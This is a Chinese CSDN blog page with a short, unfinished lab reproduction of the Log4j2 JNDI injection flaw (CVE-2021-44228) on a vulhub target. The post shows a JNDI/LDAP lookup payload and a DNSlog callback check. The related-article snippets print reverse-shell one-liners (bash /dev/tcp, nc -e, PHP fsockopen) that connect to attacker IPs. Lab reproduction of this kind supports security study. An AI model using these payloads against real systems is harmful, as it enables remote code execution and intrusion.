Log4j2简单复现-前期

最新推荐文章于 2024-04-02 10:16:13 发布
最新推荐文章于 2024-04-02 10:16:13 发布
阅读量1.6k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44844556/article/details/122040660
版权

vulhub靶场

验证:
http://vulfocus.fofa.so:xxxx/hello

payload=${jndi:ldap://hutgvp.dnslog.cn/exp}

在这里插入图片描述
DNSlog查看是否可以触发:
http://www.dnslog.cn/
在这里插入图片描述
尝试创建反弹shell:
https://www.revshells.com/
进入vps(攻击机)

ifconfig eth0

vps的IP为:10.10.10.10(举例)
生成shell:
在这里插入图片描述

有人看再继续写,

还好风不大
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3718
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
Log4j漏洞复现
m1287578441的博客
06-08 2920
Log4j漏洞复现
log4j漏洞复现
最新发布
zzf011900的博客
04-02 796
2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。命令:bash -i > /dev/tcp/192.168.59.6/5555 2>&1 0>&1。精简版:bash -i >& /dev/tcp/192.168.59.6/5555 0>&1。/dev/tcp/192.168.59.6/5555 去连接59.6的5555端口。如:http ------web服务。
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 1482
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压...
log4j-core-2.15.0-rc2.jar
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)修复版本2.0.15-rc2(jar包名称仍为2.15.0,源码编译出来的)
log4j-core-2.15.0.jar log4j-2.15.0-rc2
12-10
Apache log4j2零日漏洞,根据 log4j-2.15.0-rc2 版本编译生成log4j-api-2.15.0.jar 1.解压你的jar jar xvf XXX.jar 2. 删除旧版本jar cd ./BOOT-INF/lib rm -rf log4j-api-*.jar 3. 上传新版本log4j-api-2.15.0....
开发工具 log4j-api-2.3
05-31
开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3开发工具 log4j-api-2.3...
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7547
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 1797
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
Log4j高危漏洞原理及复现
热门推荐
qq_51302564的博客
12-15 1万+
Log4j高危漏洞原理及复现 漏洞检测||复现环境 查看JDK版本,发现版本小于1.8u121 图3-7 查看JDK版本 查看log4j2版本,发现版本在2.x <= 2.14.1内 图3-8 查看log4j2版本 查看代码,发现存在log4j2相关的lookup语句 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w9LtKVys-1639577266999)(C:\Users\BLACKF~1\AppData\Local\Temp\ksohtml\wps3AFF.
完整log4j漏洞复现
追风筝的摆渡人
12-30 2941
log4j2.X漏洞复现
反弹shell
YouthBelief的博客
12-05 1163
搭建http服务 python2 搭建http服务 python -m SimpleHTTPServer 8080 python3 搭建http服务 python -m http.server 8080 反弹shell nc -e /bin/bash -d 192.168.157.137 8080 php -r ‘$sock=fsockopen(“192.168.157.137”,8080);exec("/bin/sh -i <&3 >&3 2>&3");’ 解决s
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1466
LOG4J2(CVE-2021-44228)vulhub复现
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 1937
vulhub漏洞复现练习篇
log4j2-logstash-layout 版本
07-27
log4j2-logstash-layout的版本取决于您的项目需求和依赖项管理工具(如Maven或Gradle)中的配置。以下是一些常见的log4j2-logstash-layout版本: - 1.11.0 - 1.10.0 - 1.9.0 - 1.8.0 - 1.7.0 - 1.6.0 - 1.5.0 - ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值